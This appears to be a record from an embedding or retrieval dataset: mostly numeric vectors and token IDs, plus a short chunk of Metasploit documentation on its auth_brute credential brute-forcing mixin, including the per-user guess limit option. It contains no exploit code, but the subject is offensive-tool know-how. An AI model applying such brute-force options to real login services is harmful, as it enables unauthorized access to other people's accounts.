-0.23796895146369934, 0.5762953162193298, -0.48291364312171936, -0.04915764927864075, -0.26065510511398315, 0.9763192534446716, -0.7593397498130798, -0.2112017422914505, -0.6384983658790588, 0.22144825756549835, -0.18379923701286316, -0.3662358522415161, 0.1450439691543579, 0.21521377563476562, -0.4582903981208801, -0.7159017324447632, 0.12809385359287262, 0.05524223670363426, -0.4799700677394867, -0.5521263480186462, -0.039126694202423096, 0.8550209403038025, 0.2555881142616272, -1.0326721668243408, -0.03419947251677513, -0.5868646502494812, -0.011969894170761108, -0.14031311869621277, 0.5839245319366455, -0.34797045588493347, -1.286385178565979, -0.05608136206865311, -0.4139921963214874, 0.19434401392936707, -0.08111800253391266, 0.08451715111732483, 0.5401893258094788, -0.8544591665267944, -0.34295403957366943, 0.3503418564796448, -0.5632292628288269, -0.4335758090019226, 0.2533368170261383, 0.6842857003211975, 0.051098961383104324, 0.5935768485069275, -0.5044419765472412, -0.3415103852748871, 0.8022834658622742, -0.8223358392715454, 0.5901106595993042, -0.7597023844718933, 0.15309935808181763, 0.003159851534292102, 0.031100042164325714, 0.3434452712535858, 0.3872227072715759, -0.7896699905395508, -0.25932905077934265, 0.12256438285112381, -0.2308267056941986, -0.1704074591398239, -0.5455898642539978, 0.9404065608978271, -0.38196590542793274, -0.8384784460067749, 0.8189867734909058, -0.1846015751361847, -0.3007138967514038, -0.0056147100403904915, -0.15839317440986633, -0.45902007818222046, 0.3925003111362457, -1.0551121234893799, 0.5015059113502502, 0.15299300849437714, 0.23965531587600708, -0.27299171686172485, -0.05671236291527748, 0.6797284483909607, 0.04279237985610962, 0.45883864164352417, -0.49181899428367615, -0.6956079602241516, 0.38722726702690125, 0.020459434017539024, -0.23071148991584778, 0.05711264908313751, -0.25877344608306885, -0.4575905501842499, -0.40677347779273987, -0.20723314583301544, -0.9169162511825562, -0.323468416929245, -0.45185670256614685, 0.03492449223995209, -0.14089979231357574, -0.5742198824882507, 0.1314338892698288, -0.546349287033081, -0.5621979832649231, 0.7659408450126648, -0.09486782550811768, 0.5292567610740662, -1.082763910293579, -0.8823322653770447, -0.532711923122406, 0.35574251413345337, -0.7785846590995789, 0.0890335664153099, -0.6179431080818176, -0.07832910865545273, 0.04559110477566719, 0.29736068844795227, 0.7296371459960938, -0.27786391973495483, 0.2049693763256073, 0.5076964497566223, -0.031130239367485046, -0.5231597423553467, -0.33952632546424866, 0.6760151386260986, -0.2489994913339615, 0.5862364172935486, -0.509933352470398, -0.525644063949585, -0.7758609056472778, -0.36958056688308716, -0.04525432735681534, -0.509931206703186, 0.27048516273498535, -0.7341046929359436, -0.07839798927307129, -0.6292417049407959, 0.3807006776332855, 0.034057945013046265, -1.1550400257110596, -0.6516013741493225, 0.10749166458845139, 0.3949660360813141, -0.03479032963514328, -0.3319863975048065, -0.27841541171073914, -1.2951831817626953, 0.5437600612640381, 0.43725624680519104, -0.06136258319020271, -0.33027639985084534, 0.19939273595809937, 0.256216436624527, -0.037751201540231705, -0.15555669367313385, -0.9523460268974304, -0.4543546140193939, 0.245136097073555, 0.06701765209436417, 0.14213591814041138, 0.6166171431541443, -0.3581089675426483, -0.05641770362854004, -0.3497503101825714, 1.10872483253479, -0.5401945114135742, -0.41823309659957886, -0.09741351008415222, 0.8746583461761475, 0.9174702763557434, -0.5631445646286011, -0.18845012784004211, 0.035104475915431976, 0.18819226324558258, 0.49659353494644165, 0.27317681908607483, -0.456697016954422, 0.46505457162857056, -1.0872490406036377, -0.9590016007423401, 0.7796338200569153, -0.022651130333542824, 0.019986946135759354, -0.4155695140361786, -0.14979852735996246, 0.5404871702194214, 0.08093206584453583, 0.4328974783420563, 1.1452645063400269, 0.561786949634552, -0.24448154866695404, -0.6866773962974548, 0.5090228319168091, 0.7459973692893982, -0.10557829588651657, 0.45832565426826477, -0.5304365754127502, -0.2668493092060089, 0.7703675031661987, -0.115504190325737, 0.29819080233573914, -0.5977345705032349, -0.27047112584114075, 0.6179561018943787, -0.23266899585723877, 0.1828668862581253, -0.43337777256965637, -0.8051223754882812, -0.7296968102455139, -0.0589325949549675, -0.4705432653427124, -0.053013432770967484, 1.0026278495788574, 0.2564992308616638, -0.008224635384976864, 0.31549975275993347, 0.3799249827861786, 0.13442644476890564, -0.18804223835468292, 0.48663756251335144, 0.19388778507709503, 0.021245630457997322, 0.7241879105567932, 0.5869464874267578, -0.7772826552391052, -0.633384644985199, -0.46182215213775635, 0.2874247133731842, 0.3000435531139374, -0.21747927367687225, -0.14687637984752655, 0.7133710384368896, -0.3933069705963135, 0.23572209477424622, 0.09821124374866486, -0.0008639203733764589, 0.5086057186126709, -0.8902158141136169, 0.7183651328086853, -0.23867754638195038, 0.3276517391204834, 0.6819155216217041, -0.48215410113334656, -0.11418159306049347, -0.7866215109825134, 0.1787388026714325, 0.08375079184770584, 0.08118389546871185, 0.2111407369375229, -0.18128451704978943, 0.17450766265392303, 0.3425925672054291, 0.007322595454752445, 0.861605703830719, -0.16683927178382874, 0.19281944632530212, 0.7164613604545593, -0.06055804342031479, -0.59829181432724, -0.3548663556575775, -0.19998183846473694, -0.41135892271995544, 0.34046539664268494, -0.32107239961624146, 0.033422842621803284, 0.4180925190448761, 0.5105240345001221, -0.7644039988517761, -1.3399338722229004, -0.4978873133659363, -0.6072943210601807, -0.10031960904598236, 0.1413223296403885, -0.35129496455192566, -0.10013649612665176, 0.3421345353126526, -0.2960624098777771, 0.061573196202516556, -0.6292283535003662, -0.2073371708393097, -0.424604207277298, 0.11030013114213943, -0.39987966418266296, 0.33765149116516113, -0.7709372639656067, -0.2963087856769562, -0.7002326250076294, -0.6393992304801941, 0.007959244772791862, -0.6766709089279175, -0.40164628624916077, 0.032254621386528015, 0.29831933975219727, 0.30522575974464417, -1.1881062984466553, 0.294773131608963, -0.2974282503128052, -0.5540786385536194, 0.020961765199899673, 0.5352485179901123, -0.42273059487342834, 0.20192980766296387, 0.6479716300964355, 0.30924108624458313, 0.9249784350395203, -1.2123141288757324, 0.11499907821416855, 0.30762261152267456, -0.024490468204021454, 0.2552552819252014, -0.27990829944610596, -0.39202186465263367, -0.3593212962150574, 0.06659450381994247, -0.2518394887447357, -0.4309053122997284, -1.3379217386245728, -0.02820008248090744, 0.10352885723114014, -0.45146849751472473, -0.043622009456157684, 0.7358837127685547, 0.06399846076965332, 0.11469865590333939, 0.07079305499792099, 0.5588099956512451, 0.6864749193191528, -0.8237510919570923, -0.2652432918548584, 0.8402429819107056, 0.9559705853462219, -0.609175980091095, -0.10743163526058197, -0.10113871097564697, -0.8525940179824829, 0.12094884365797043, 0.015028801746666431, -0.21977078914642334, -0.7040777802467346, -0.42882341146469116, 0.9295105338096619, 0.5829559564590454, 0.4003402292728424, 0.3196411728858948, 0.0861322283744812, 0.20973964035511017, -0.8605108261108398, 0.21516819298267365, -1.3689616918563843, 0.17302247881889343, -0.09517155587673187, -1.3360475301742554, -0.4834418296813965, -0.38896915316581726, -0.17473721504211426, 0.7169153690338135, 0.24257607758045197, -0.032484184950590134, 0.004497317131608725, 0.5150581002235413, -0.02655278891324997, 0.985277533531189, -0.7654059529304504, -0.3806518316268921, -0.09495358914136887, 0.2918371260166168, -0.9409029483795166, -0.911117672920227, -0.08042647689580917, 1.0078978538513184, 0.3995867967605591, -0.12970802187919617, -0.5059021711349487, 0.014612426050007343, 0.7032731175422668, 0.21809355914592743, 0.42077332735061646, 0.3782651126384735, -0.3740251064300537, 0.9733320474624634, -0.6715967059135437, 0.40785452723503113, 0.16864193975925446, 0.36137503385543823, 0.1992354542016983, 0.1983826756477356, -0.6988756060600281, 0.3572187125682831, -0.6239422559738159, -0.47347187995910645, 0.7777982354164124, 0.6649042963981628, 0.7969763278961182, -0.8331985473632812, 0.49701428413391113, -0.24023520946502686, 0.5853652954101562, 1.0129036903381348, 0.15468117594718933, -0.3484276235103607, 0.30379271507263184, 0.47018298506736755, -0.8927887678146362, -0.12143445014953613, 0.6906651258468628, 0.2341327965259552, -0.7451755404472351, 0.8371036052703857, 0.1950291395187378, -0.21319794654846191, -0.296504944562912, -0.41329407691955566, -0.24836932122707367, 0.08657930046319962, 0.20800121128559113, 0.45419079065322876, -0.14298208057880402, 1.0434885025024414, -0.2688610851764679, -0.08512710779905319, -0.03471137583255768, -0.31332889199256897, 0.4152430295944214, -0.43056803941726685, -0.5404180288314819, 0.3046940267086029, 1.5650925636291504, 0.03335386514663696, -0.2587769627571106, 0.7022596597671509, -0.4753077030181885, 0.22340735793113708, 0.39626339077949524, -0.07191945612430573, -0.18023347854614258, 0.07218044251203537, 0.4730311632156372, -0.4594995975494385, -0.699829638004303, -0.345359206199646, -0.006365239154547453, -0.40713316202163696, 0.13728885352611542, 0.05118684098124504, 0.35302460193634033, -0.538386881351471, 1.0072596073150635, -0.2070336937904358, -0.10275089740753174, 0.2711687684059143, -0.2119472324848175, -0.5465488433837891, 0.34080392122268677, 0.20077097415924072, 0.39956024289131165, -0.33851417899131775, 1.0537933111190796, 0.479018896818161, -0.03489922732114792, 0.07840652763843536, -0.6701136231422424, -0.37591463327407837, -0.25458016991615295, -0.3518213927745819, -0.08752439171075821, 0.17681100964546204, -0.37299761176109314, 0.052434999495744705, -0.24901539087295532, -0.6723438501358032, -0.8112322092056274, 0.032003387808799744, -0.5749127268791199, -0.6514353156089783, 0.9762532114982605, -0.1080552190542221, -0.4770762324333191, -0.33539777994155884, -0.2284107655286789, -0.03680385276675224, 0.338226318359375, -0.16756662726402283, -1.0469038486480713, -0.9999764561653137, -0.253751277923584, -0.24577397108078003, 0.18319940567016602, -0.1092308983206749, -0.1720176786184311, -0.31381121277809143, -0.8147249817848206, -0.6563930511474609, 0.046052802354097366, -0.0013772135134786367, -0.46215569972991943, 0.948232889175415, 0.46587514877319336, 0.7584698796272278, 0.7984994649887085, -0.1422298550605774, 0.11245375126600266, 0.08369945734739304, 0.8459064364433289, -1.1403775215148926, 0.7969548106193542, 0.3982306122779846, 0.13798148930072784, 0.44824424386024475, -0.14971531927585602, 0.7072362303733826, -0.2976934313774109, -0.36058178544044495, -0.33729490637779236, -0.1623104214668274, -0.8355821967124939, 0.06822364777326584, 0.06713678687810898, 0.062520332634449, -0.10334131866693497, -0.08531350642442703, -1.2210618257522583, -0.4414210319519043, -0.8523169755935669, 0.009168184362351894, -0.5555476546287537, 0.5931535363197327, 0.10682009160518646, -0.14826110005378723, 0.2896244525909424, -1.1192737817764282, 4.189220905303955, 0.6360833048820496, 0.39711087942123413, -0.18832050263881683, 0.3108202815055847, 0.709977924823761, 0.7054028511047363, -0.19302144646644592, 0.2175496518611908, -0.2501946687698364, 0.32538795471191406, 0.1563989222049713, 0.37889447808265686, 0.3254411816596985, -0.104181207716465, 0.1169903352856636, -0.5654052495956421, 0.1935715675354004, 0.12194542586803436, -1.002265214920044, -1.3534092903137207, -0.18736611306667328, -0.22042731940746307, 0.3439319431781769, 0.11152659356594086, -0.035659585148096085, 0.09703046828508377, -0.10297290235757828, 0.6882225871086121, -0.13508084416389465, -0.18149788677692413, -0.6698139905929565, 0.09992479532957077, 0.08968553692102432, -0.8124186396598816, 0.5377521514892578, 0.16729708015918732, -0.16542255878448486, -0.28924959897994995, -0.3640899956226349, 0.9053450226783752, 0.36686089634895325, -0.27437472343444824, -0.6289589405059814, 0.486167311668396, 0.7202823758125305, -0.7545862197875977, 0.3745613098144531, 0.7991507649421692, -0.6456772685050964, 0.9029251337051392, 0.14645719528198242, 0.6688732504844666, -0.14786873757839203, -0.49761438369750977, 0.21507002413272858, -0.19013838469982147, -0.4648136496543884, 0.06621291488409042, 0.10806336998939514, 0.4019084572792053, -0.2114322930574417, 0.49623486399650574, -0.7922878265380859, -0.8392587900161743, 0.755111813545227, -0.19629167020320892, 0.4357503354549408, 0.17740507423877716, -0.7593571543693542, -0.2144934982061386, -0.24335543811321259, -0.5014443397521973, -0.15715676546096802, 0.7795014381408691, -0.06676261872053146, 0.30121347308158875, 0.4381493628025055, 0.37439626455307007, -0.2321050465106964, -0.6441510319709778, -0.8226172924041748, -0.5700060129165649, -0.16619057953357697, 0.3532257080078125, 0.48275166749954224, -0.1332167088985443, -0.40450572967529297, 0.2640611231327057, 0.28656378388404846, 0.5015159845352173, 0.3548012971878052, -0.11888542771339417, 0.0394013337790966, -0.047085970640182495 ]
[ 101, 2129, 2000, 2224, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 8740, 2705, 19892, 10421, 2000, 4339, 1037, 26128, 14821, 15265, 2063, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 8740, 2705, 19892, 10421, 4666, 2378, 2323, 2053, 2936, 2022, 2109, 2000, 4339, 1037, 8833, 2378, 11336, 1010, 2017, 2323, 3046, 2256, 8833, 7076, 9336, 3678, 17928, 2612, 1012, 2174, 1010, 2070, 1997, 1996, 2951, 23809, 2063, 7047, 2024, 2145, 2734, 1010, 2061, 2292, 1521, 1055, 2175, 2058, 2068, 2157, 4248, 1012, 3180, 7047, 20330, 18442, 1011, 1006, 5164, 1007, 1037, 3563, 5310, 18442, 2000, 14469, 3686, 2004, 1012, 20786, 1011, 1006, 5164, 1007, 1037, 3563, 20786, 2000, 14469, 3686, 2007, 1012, 5310, 1035, 5371, 1011, 1006, 5164, 1007, 5371, 4820, 5310, 18442, 2015, 1010, 2028, 2566, 2240, 1012, 3413, 1035, 5371, 1011, 1006, 5164, 1007, 5371, 4820, 20786, 2015, 1010, 2028, 2566, 2240, 1012, 5310, 15194, 1035, 5371, 1011, 1006, 5164, 1007, 5371, 4820, 5198, 1998, 20786, 2015, 5459, 2011, 2686, 1010, 2028, 3940, 2566, 2240, 1012, 26128, 14821, 1035, 3177, 1011, 1006, 16109, 1007, 2129, 3435, 2000, 26128, 14821, 1010, 2013, 1014, 2000, 1019, 1012, 12034, 9232, 1011, 1006, 22017, 20898, 1007, 3251, 2000, 6140, 6434, 2005, 2035, 4740, 1012, 8744, 1035, 20786, 2015, 1011, 1006, 22017, 20898, 1007, 3046, 8744, 20786, 2015, 2005, 2035, 5198, 1012, 5310, 1035, 2004, 1035, 3413, 1011, 1006, 22017, 20898, 1007, 3046, 1996, 5310, 18442, 2004, 1996, 20786, 2005, 2035, 5198, 1012, 16962, 1035, 2035, 1035, 13675, 2098, 2015, 1011, 1006, 22017, 20898, 1007, 3046, 2169, 5310, 1013, 20786, 3232, 8250, 1999, 1996, 2783, 7809, 1012, 16962, 1035, 2035, 1035, 5198, 1011, 1006, 22017, 20898, 1007, 5587, 2035, 5198, 1999, 1996, 2783, 7809, 2000, 1996, 2862, 1012, 2644, 1035, 2006, 1035, 3112, 1011, 1006, 22017, 20898, 1007, 2644, 16986, 2043, 1037, 13675, 14728, 19909, 2573, 2005, 1037, 3677, 1012, 3935, 7047, 28578, 21818, 1035, 5310, 1035, 5371, 1011, 1006, 22017, 20898, 1007, 8073, 3972, 12870, 1996, 5310, 1035, 5371, 2006, 11336, 6503, 1012, 6366, 1035, 3413, 1035, 5371, 1011, 1006, 22017, 20898, 1007, 8073, 3972, 12870, 1996, 3413, 1035, 5371, 2006, 11336, 6503, 1012, 6366, 1035, 5310, 15194, 1035, 5371, 1011, 1006, 22017, 20898, 1007, 8073, 3972, 12870, 1996, 5310, 15194, 1035, 5371, 2006, 11336, 6503, 1012, 4098, 22967, 8583, 7347, 2121, 7903, 2063, 1011, 1006, 16109, 1007, 4555, 2193, 1997, 22496, 2000, 3046, 2566, 2326, 6013, 1012, 2065, 2275, 2000, 5717, 2030, 1037, 2512, 1011, 2193, 1010, 2023, 5724, 2097, 2025, 2022, 2109, 1012, 4098, 10020, 10421, 17668, 8043, 7903, 2063, 1011, 1006, 16109, 1007, 4555, 2051, 1999, 2781, 2000, 26128, 14821, 1996, 2326, 6013, 1012, 2065, 2275, 2000, 5717, 2030, 1037, 2512, 1011, 2193, 1010, 2023, 5724, 2097, 2025, 2022, 2109, 1012, 4098, 22967, 8583, 4842, 20330, 1011, 1006, 16109, 1007, 4555, 3984, 2229, 2005, 1037, 3327, 5310, 18442, 2005, 1996, 2326, 6013, 1012, 3602, 2008, 5198, 2024, 2641, 4310, 2426, 2367, 2578, 1010, 2061, 1037, 5310, 2012, 2184, 1012, 1015, 1012, 1015, 1012, 1015, 1024, 2570, 2003, 2367, 2013, 2028, 2012, 2184, 1012, 1016, 1012, 1016, 1012, 1016, 1024, 2570, 1010, 1998 ]
metasploit
124.txt
0
both will be tried up to the maxguessesperuser limit. if set to zero or a non - number, this option will not be used. referencehttps : / / github. com / rapid7 / metasploit - framework / blob / master / lib / msf / core / auxiliary / auth _ brute. rb [SEP]
[ 0.49954602122306824, -0.1873587816953659, 0.1740894615650177, 0.770727813243866, -0.4865855872631073, -0.306731253862381, -0.2944214344024658, 0.8947447538375854, -0.3985518515110016, 0.872570812702179, 0.0620514377951622, 0.4402635395526886, 0.1527557224035263, 0.13391514122486115, -0.6719576716423035, -0.019406624138355255, 0.2348652184009552, 0.17135007679462433, -0.32787764072418213, -0.04121391475200653, 0.6060341596603394, 0.14457906782627106, -1.3823106288909912, -0.35406285524368286, -0.7587571144104004, 0.19901053607463837, 0.23049472272396088, -0.5339069366455078, 1.4175697565078735, 1.0841996669769287, -0.447601854801178, -0.2253745198249817, -0.04962844029068947, -0.7116495966911316, -0.9846633672714233, -0.8842794895172119, 0.5491758584976196, -0.3862398862838745, -0.5638940930366516, -0.7362421154975891, -0.05422332137823105, 0.027004050090909004, -0.174429252743721, -0.46866217255592346, -0.7002758383750916, -0.3566898703575134, -0.16763725876808167, 0.19759543240070343, -0.2016158550977707, -0.3767355680465698, -0.3221094310283661, 0.21258461475372314, 0.3676527440547943, 0.21718382835388184, 0.36005309224128723, -0.13025906682014465, 0.11951577663421631, -0.19588971138000488, -0.5164998769760132, 0.1452329009771347, 0.052398961037397385, 0.5516940951347351, 0.15727855265140533, -0.2736342251300812, 0.42215049266815186, 0.23290906846523285, -0.2087482213973999, -0.08315577358007431, -0.31841084361076355, -0.2859954833984375, 0.23147565126419067, 0.2683059871196747, -0.1833646297454834, -0.3929000198841095, -0.5374441146850586, 0.6697279810905457, 0.4545668363571167, 0.12699221074581146, -0.1579124629497528, 1.1614347696304321, -0.5102275609970093, 0.20638255774974823, 0.4839452803134918, -0.6703936457633972, -0.45896270871162415, -0.32869452238082886, 0.6198698878288269, -0.10355408489704132, -0.785477876663208, -0.31435054540634155, -0.34234580397605896, 0.5548775792121887, 0.379609078168869, 0.10277237743139267, 0.22252370417118073, 0.6337310671806335, -0.5812705755233765, 0.4210980236530304, 0.71488356590271, -0.04179892688989639, 0.20298722386360168, 0.40914979577064514, 0.09189310669898987, 0.17310869693756104, 0.19776466488838196, 0.7211323380470276, -0.029057037085294724, 0.2152041643857956, -0.538493812084198, -0.13446393609046936, -0.38104870915412903, -0.2819981873035431, 0.08836062252521515, -0.5045221447944641, -0.3647283911705017, -0.0664648562669754, -0.28534042835235596, -0.1081872433423996, -0.5749883651733398, 0.24723222851753235, 0.7221830487251282, 0.03156556561589241, 0.1950598657131195, -0.42938104271888733, 0.03645932301878929, -0.6524664759635925, -0.05762464180588722, 0.4088716506958008, -0.46796664595603943, -0.8186927437782288, -0.09533442556858063, 0.10280324518680573, 0.6182573437690735, 0.5950015187263489, 0.07003891468048096, 0.931444525718689, -0.24598552286624908, -0.264612078666687, 0.9640619158744812, -1.0630195140838623, 0.6869631409645081, 0.2693351209163666, 0.6455099582672119, 1.0306310653686523, -0.13679489493370056, 0.19806896150112152, -0.032509587705135345, -0.36370599269866943, -0.5615613460540771, 0.2023795247077942, -0.06261391192674637, 0.02736998163163662, 0.09043581783771515, 0.04292657598853111, 0.7304129600524902, -0.027233079075813293, -0.10467974096536636, 0.25332003831863403, -0.41353899240493774, 0.8322839140892029, 0.18225017189979553, 0.7843140959739685, -0.6748155951499939, 0.8071174621582031, 0.18961507081985474, 0.38809290528297424, -0.3600897789001465, 0.17463728785514832, 0.21011894941329956, -0.7058572769165039, 0.4414459466934204, -0.09460259228944778, 0.003105182433500886, 0.57221919298172, 0.8204039931297302, 0.0414765439927578, -0.06203429028391838, -0.08962678909301758, 0.5899645686149597, 0.5896587371826172, -0.5236983895301819, 1.0630133152008057, 0.29056042432785034, 0.870450496673584, 0.37255167961120605, -0.013809684664011002, -0.25028494000434875, -0.5150835514068604, -0.5359621047973633, -0.657086968421936, 0.20385099947452545, 0.21487119793891907, 0.04445285722613335, 0.4491086006164551, -0.04191749542951584, 0.48219960927963257, -0.26374727487564087, 0.20562425255775452, 0.05998510122299194, -0.805766224861145, -0.8741677403450012, 1.0857435464859009, -0.786208987236023, 1.2840690612792969, -0.13209813833236694, -0.9395233988761902, 0.5733143091201782, 0.7688565850257874, -0.045956309884786606, -0.3436676859855652, 0.5112722516059875, 0.0036040358245372772, -0.677759051322937, -0.2632494866847992, -0.026475882157683372, -0.6276305317878723, -0.6853762269020081, 1.0303418636322021, 0.016429947689175606, 0.538888692855835, -0.2933594882488251, 0.7606915235519409, -0.2088664025068283, 0.4646759331226349, 0.06141810491681099, -0.11672501266002655, -0.3596329092979431, 0.6973755955696106, -0.13793978095054626, 0.6777631044387817, -0.20894750952720642, -0.05948744714260101, -0.39055049419403076, 1.7520922422409058, -0.29245829582214355, 0.40691104531288147, 0.5102739334106445, 0.4380430579185486, -0.12822325527668, 0.4620721936225891, 0.1849469542503357, 0.4853556156158447, 0.33178064227104187, 0.7513589262962341, 0.14381803572177887, 0.6223970651626587, 0.08839232474565506, 0.23926588892936707, 0.17962433397769928, 0.05206262320280075, -0.4650392532348633, 0.715133011341095, 0.18846172094345093, -0.11434697359800339, -1.3224040269851685, -0.5775911808013916, 0.0647386834025383, 0.19394280016422272, -0.6090821027755737, 0.007083196192979813, -0.4193415641784668, -0.2883320152759552, -0.2654865086078644, -0.7488102912902832, -0.19451458752155304, -0.1375138908624649, 0.43654879927635193, -0.10285388678312302, -0.5587764978408813, -0.3407351076602936, -0.5173405408859253, -0.4169045686721802, -0.42092135548591614, -0.3479013741016388, -0.626241147518158, -0.019858144223690033, 0.38917413353919983, -0.04083162918686867, -0.24133293330669403, -0.6531236171722412, 0.21348689496517181, 0.10192683339118958, -0.1464923620223999, 1.142768383026123, -0.20825713872909546, 0.4052685499191284, -0.47888222336769104, -0.181168794631958, -0.40043532848358154, 0.8708078265190125, -0.7694509029388428, -0.21381328999996185, 0.4513823688030243, -0.5182055830955505, 0.37374135851860046, -0.7564136385917664, 0.30478018522262573, -0.12509599328041077, -0.36069634556770325, 0.036161869764328, -0.21836307644844055, 0.43655961751937866, 0.7394582033157349, 0.4967808723449707, -0.529974639415741, -0.1483405977487564, 0.289741575717926, -0.48502659797668457, 0.7469512820243835, 0.720991313457489, -0.3124321699142456, 1.1101906299591064, -0.4286491274833679, 0.4662265479564667, -0.6622652411460876, 0.30122238397598267, 0.5337210893630981, -0.18154416978359222, -0.43801841139793396, -0.5672774910926819, -0.20728787779808044, -0.6551133990287781, 0.16524532437324524, 0.39367491006851196, -0.5949098467826843, 0.027742113918066025, -0.1563403159379959, -1.1081544160842896, 0.9315785765647888, -0.8706288933753967, -0.370316743850708, -0.2209935337305069, -0.5731229782104492, 0.8249539732933044, 0.06751006841659546, 0.05540243163704872, -0.7835724353790283, -0.622810423374176, -0.686130702495575, 0.023156872019171715, 0.3818834125995636, -0.4807945489883423, 0.4595276117324829, -0.22291648387908936, -0.2821391522884369, -0.5360836982727051, 0.38180744647979736, -0.46408170461654663, -0.6700060963630676, 0.13639314472675323, 0.814937949180603, 0.5374628305435181, 0.42944568395614624, 0.3334731459617615, 0.9604611992835999, 0.7434129118919373, -0.3934062421321869, 0.22595416009426117, 0.4150122106075287, 0.1136339083313942, 0.5734980702400208, -0.3694385588169098, -0.38864630460739136, 0.3186783194541931, -0.029808955267071724, -1.0161082744598389, -0.18347099423408508, 1.4959099292755127, 1.2868331670761108, -0.521861732006073, 0.45518913865089417, -0.25914737582206726, 0.07162262499332428, 0.34319376945495605, 0.1849251538515091, 0.15324333310127258, 0.22214671969413757, -0.04171164706349373, 0.3243544399738312, -0.2681702673435211, -0.36151766777038574, -0.21501290798187256, 0.7080277800559998, 0.22649015486240387, -0.25553831458091736, 0.014448000118136406, -0.6553745269775391, -0.39390575885772705, -0.30882689356803894, 0.09046760201454163, -0.6937222480773926, -0.20645681023597717, 0.16092512011528015, -1.1263500452041626, -1.0631301403045654, -0.4462625980377197, 0.6039621829986572, 0.9956404566764832, 0.693781316280365, 0.2978422939777374, 0.7521709203720093, 0.17933833599090576, 0.6927109360694885, 0.6731569170951843, -0.08091556280851364, 0.015066651627421379, -0.5550885200500488, 0.6520893573760986, -0.20915767550468445, 0.26866796612739563, -0.5528329014778137, 0.19867254793643951, 0.07705701887607574, 0.5734198093414307, -0.4613208472728729, -0.1074792817234993, 0.03458099067211151, 0.2831375002861023, 0.2737240791320801, 0.7455003261566162, -0.2719825208187103, -0.8558446168899536, 0.03409573808312416, 0.8827438950538635, 1.1054946184158325, -0.7551919221878052, -1.0355110168457031, -0.3661896586418152, -0.1143699586391449, 0.38111820816993713, 0.11707095056772232, -0.7663953304290771, -0.7677151560783386, -1.1192421913146973, -1.4322688579559326, 0.20672984421253204, 0.5336474776268005, -0.6039107441902161, -0.08420645445585251, -0.6589407324790955, -0.056895241141319275, -0.3912091553211212, -0.3621146082878113, -0.5335032939910889, 0.2772149443626404, -0.3526178300380707, -0.11046388000249863, -0.1741882711648941, -0.7976213097572327, -0.8654565215110779, 0.4617655575275421, 0.007856855168938637, 0.5841155648231506, -0.48303303122520447, -0.06842680275440216, -0.2264295220375061, 0.17868785560131073, 1.0728743076324463, 0.6264251470565796, -0.41153818368911743, -0.17560552060604095, -0.5589381456375122, 0.2071581482887268, -0.29515835642814636, -0.1289767324924469, 0.3134816884994507, -0.25186464190483093, -0.060606393963098526, 1.1033462285995483, 0.11189895868301392, -0.38951554894447327, 0.49416130781173706, 0.2996998727321625, -0.6982107758522034, 0.3702153265476227, 0.05105949193239212, 0.8547152280807495, -0.2984353303909302, -0.33579549193382263, 0.5159967541694641, -0.8887158632278442, 1.2714643478393555, 0.6822009682655334, -0.19675257802009583, -0.2512684762477875, -0.9045892357826233, 0.5738009214401245, -0.18760253489017487, -0.2735920548439026, 0.6668077707290649, -0.48248207569122314, 0.09464706480503082, 0.4947696328163147, 0.03492490202188492, -0.45170125365257263, 0.5318799614906311, -0.08676791191101074, 0.20618979632854462, 0.5498801469802856, 0.4155031740665436, -0.2087741643190384, 0.3586690425872803, -0.38995519280433655, 0.7142009139060974, -0.785066545009613, -0.2907230257987976, -0.5998287200927734, -0.6728135943412781, -0.6671121120452881, 0.14932075142860413, -0.7650187611579895, -0.09773771464824677, -0.2983343005180359, 0.5899083018302917, 0.2299511730670929, -0.11596368253231049, 0.8819001317024231, -0.3857251703739166, -0.12073490768671036, 0.5612065196037292, -0.2385590672492981, -0.9261660575866699, 0.2588822841644287, 1.1855993270874023, -0.7082279920578003, 0.5452967286109924, -0.13984553515911102, -0.45639488101005554, -1.0277737379074097, 0.6236172318458557, 0.19326472282409668, -0.2645277678966522, -0.6414763331413269, -0.5305720567703247, -1.369997501373291, -1.2166352272033691, 0.2979888916015625, 0.9846474528312683, -0.9282045960426331, 0.23600178956985474, -0.9188019037246704, 0.341054767370224, -0.3989853262901306, -0.1760261356830597, -0.33732718229293823, -0.557755172252655, -0.07828505337238312, 0.7118304371833801, 0.025674760341644287, -0.1293766349554062, -0.09932013601064682, 0.27570632100105286, 0.09669112414121628, 0.34135839343070984, -0.5642667412757874, -1.0399521589279175, 0.026423627510666847, -0.5065750479698181, 0.03736201673746109, 1.3129398822784424, -0.8120177388191223, -0.48592379689216614, -0.10344904661178589, 0.7510104179382324, -0.40160760283470154, -0.22703072428703308, -0.74866783618927, 0.4647639989852905, 0.8526231646537781, -0.8374463319778442, 0.8156963586807251, 0.770642876625061, -0.20163509249687195, 0.3806852698326111, 0.9062260389328003, -0.4139290452003479, 0.8925372362136841, -1.0544636249542236, -1.0613150596618652, 0.4743674099445343, 0.47619301080703735, 0.7383102178573608, 0.406286358833313, -1.035034418106079, 0.5146040320396423, -0.6219415664672852, 0.513139545917511, 1.2766889333724976, -0.13492025434970856, 0.1004667654633522, -0.561170220375061, 0.5721930861473083, 0.5062433481216431, -0.8859540224075317, -0.3232395052909851, 0.1148962676525116, -0.37471893429756165, -0.07999377697706223, -0.3713217079639435, -0.32281580567359924, -0.9607074856758118, -0.05626105144619942, 0.5027357935905457, -0.3472142815589905, 0.87996506690979, -1.0702848434448242, -1.3083722591400146, -0.9558231234550476, 0.18291451036930084, -0.5854415893554688, 0.7399583458900452, 0.3807656764984131, -0.03583283722400665, -0.3607204854488373, 0.38657665252685547, -0.19895118474960327, -0.19728983938694, -0.7509021162986755, 0.7323451638221741, 0.28968676924705505, -0.032128676772117615, 1.2177308797836304, 0.7387690544128418, -0.3485226333141327, -1.3024884462356567, -0.12443169206380844, -0.4200522303581238, -0.6000421047210693, -0.43584251403808594, -0.754633367061615, -0.18576721847057343, -0.4417264461517334, 0.4725225269794464, 0.24693936109542847, -0.039624568074941635, 0.6253899931907654, -0.4337543845176697, 0.8731668591499329, -0.8964455723762512, 0.5491502285003662, 1.0875238180160522, 0.2163265347480774, -0.4142310917377472, -0.9643851518630981, -0.14898324012756348, -0.1436995416879654, 0.550568163394928, 0.29973429441452026, 0.3543347120285034, 0.7222050428390503, 0.43759071826934814, 1.0418109893798828, 1.5163731575012207, -0.3932335078716278, 0.8402646780014038, 0.4165414869785309, -1.1949313879013062, -0.18794845044612885, -0.1437545120716095, -0.4386434853076935, -0.570275604724884, 0.8179782629013062, 0.24496708810329437, 0.489854633808136, 0.4170893132686615, 0.5357392430305481, -0.27542370557785034, -1.5004591941833496, 0.6482885479927063, 